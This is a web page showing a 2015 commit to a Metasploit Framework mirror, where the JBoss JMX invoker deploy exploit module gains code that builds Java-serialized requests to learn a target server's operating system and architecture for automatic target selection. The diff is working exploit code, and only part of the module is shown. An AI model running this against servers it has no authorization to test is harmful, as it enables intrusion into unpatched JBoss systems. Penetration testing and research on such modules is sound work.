infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Auto detect platform without raw streams

bug/bundler_fix
jvazquez-r7 2015-01-22 15:15:08 -06:00
parent ad276f0d52
commit 20d7fe631e
1 changed files with 72 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

84
modules/exploits/multi/http/jboss_invoke_deploy.rb
View File

@ -236,7 +236,11 @@ EOT
def send_serialized_request(file_name , replace_params = {})
case file_name
when 'version.bin'
data = build_version.encode
data = build_get_version.encode
when 'osname.bin'
data = build_get_os.encode
when 'osarch.bin'
data = build_get_arch.encode
else
path = File.join( Msf::Config.data_directory, "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name)
data = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) }
@ -309,10 +313,10 @@ EOT
def auto_target
print_status("Attempting to automatically select a target")
plat = detect_platform()
arch = detect_architecture()
plat = detect_platform
arch = detect_architecture
return nil if (not arch or not plat)
return nil unless arch && plat
# see if we have a match
targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
@ -327,13 +331,13 @@ EOT
print_status("Attempting to automatically detect the platform")
res = send_serialized_request("osname.bin")
if (res.body =~ /(Linux|FreeBSD|Windows)/i)
if res.body =~ /(Linux|FreeBSD|Windows)/i
os = $1
if (os =~ /Linux/i)
if os =~ /Linux/i
return 'linux'
elsif (os =~ /FreeBSD/i)
elsif os =~ /FreeBSD/i
return 'linux'
elsif (os =~ /Windows/i)
elsif os =~ /Windows/i
return 'win'
end
end
@ -342,12 +346,12 @@ EOT
# Try to autodetect the architecture
def detect_architecture()
def detect_architecture
print_status("Attempting to automatically detect the architecture")
res = send_serialized_request("osarch.bin")
if (res.body =~ /(i386|x86)/i)
if res.body =~ /(i386|x86)/i
arch = $1
if (arch =~ /i386|x86/i)
if arch =~ /i386|x86/i
return ARCH_X86
# TODO, more
end
@ -355,7 +359,7 @@ EOT
nil
end
def build_version
def build_get_version
builder = Rex::Java::Serialization::Builder.new
object_array = builder.new_array(
@ -383,6 +387,62 @@ EOT
build_invocation(stream)
end
def build_get_os
builder = Rex::Java::Serialization::Builder.new
object_array = builder.new_array(
values_type: 'java.lang.Object;',
values: [
builder.new_object(
name: 'javax.management.ObjectName',
serial: 0xf03a71beb6d15cf,
flags: 3,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
),
Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')
],
name: '[Ljava.lang.Object;',
serial: 0x90ce589f1073296c,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
stream.contents << object_array
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'OSName')
build_invocation(stream)
end
def build_get_arch
builder = Rex::Java::Serialization::Builder.new
object_array = builder.new_array(
values_type: 'java.lang.Object;',
values: [
builder.new_object(
name: 'javax.management.ObjectName',
serial: 0xf03a71beb6d15cf,
flags: 3,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
),
Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')
],
name: '[Ljava.lang.Object;',
serial: 0x90ce589f1073296c,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
stream.contents << object_array
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'OSArch')
build_invocation(stream)
end
def build_invocation(stream_argument)
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []